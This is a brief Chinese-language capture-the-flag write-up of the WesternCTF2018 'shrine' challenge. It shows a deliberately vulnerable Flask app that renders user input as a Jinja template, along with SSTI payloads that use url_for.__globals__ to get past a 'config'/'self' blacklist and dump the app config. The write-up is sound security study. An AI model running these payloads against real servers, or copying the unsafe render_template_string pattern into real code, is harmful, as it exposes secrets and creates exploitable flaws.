[WesternCTF2018]shrine(学习).md

首页长这样

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
	return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
	def safe_jinja(s):
		s = s.replace('(', '').replace(')', '')
		blacklist = ['config', 'self']
		return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

	return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
	app.run(debug=True)

显然是个flaskSSTI

/shrine/{{1+1}}

2

flag保存在app.config里,所以只要访问/shrine/{{config}}就可以了啊哈哈(

blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

并不行,这俩被替换成None

网上给出的解决方案是利用flaskurl_for函数以及python__globals__魔法,获取url_for所在环境中的全局变量

/shrine/{{url_for.__globals__}}


/shrine/{{url_for.__globals__['current_app'].config}}

#Web #python #flask #SSTI #urlfor #globals #bypass